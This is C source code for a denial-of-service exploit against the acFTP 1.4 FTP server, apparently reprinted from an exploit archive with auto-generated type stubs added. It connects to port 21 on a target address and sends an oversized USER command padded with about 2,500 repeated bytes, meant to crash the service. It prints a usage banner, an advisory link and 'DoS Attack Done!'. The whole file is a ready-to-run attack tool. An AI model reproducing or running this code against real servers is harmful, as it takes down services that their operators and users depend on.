
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct sockaddr_in {int sin_addr; int sin_family; int sin_port; } ;
struct sockaddr {int dummy; } ;
typedef int saddr ;
typedef int buf ;


 int AF_INET ;
 int INVALID_SOCKET ;
 int MAKEWORD (int,int) ;
 scalar_t__ SOCKET_ERROR ;
 int SOCK_STREAM ;
 scalar_t__ WSAStartup (int ,int *) ;
 int close (int ) ;
 int closesocket (int ) ;
 scalar_t__ connect (int ,struct sockaddr*,int) ;
 int exit (int) ;
 int htons (int) ;
 unsigned long inet_addr (char*) ;
 int memcpy (int *,unsigned long*,int) ;
 int memset (struct sockaddr_in*,int ,int) ;
 int printf (char*,...) ;
 int send (int ,char*,int,int ) ;
 int sleep (int) ;
 int sock ;
 int socket (int ,int ,int ) ;
 int strcat (char*,char*) ;
 int wVersionRequested ;
 int wsaData ;

int main(int argc, char **argv)
{
char buf[2505];
struct sockaddr_in saddr;
unsigned long ip;
int i;

if (argc != 2)
{
printf("acFTP 1.4 USER Command - DoS Exploit!\r\n");
printf("Coded by OmniPresent - omnipresent@email.it\r\n");
printf("acFTP 1.4 - DoS Exploit!rn");
printf("Advisory: http://secunia.com/advisories/19978/");
printf("%s <IP_Address>\r\n", argv[0]);

exit(1);
}

ip = inet_addr(argv[1]);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
{
printf("Socket Error \n");
exit(1);
}


memset(&saddr,'0', sizeof(saddr));
saddr.sin_port = htons(21);
saddr.sin_family = AF_INET;
memcpy(&saddr.sin_addr, (unsigned long *)&ip, sizeof((unsigned long *)&ip));

if (connect(sock, (struct sockaddr *)&saddr, sizeof(saddr)) == SOCKET_ERROR)
{
printf("Connect Error \n");
exit(1);
}

sleep(2);

    buf[0]='U';
    buf[1]='S';
    buf[2]='E';
    buf[3]='R';
    buf[4]=' ';
    i = 5;
while (i < 2500) {

buf[i] = 'A';
i++;
buf[i] = '{';
i++;
}
strcat(buf, "\r\n");

printf("%s\n",buf);


send(sock, buf, sizeof(buf), 0);




close(sock);

printf("DoS Attack Done!\n");
}
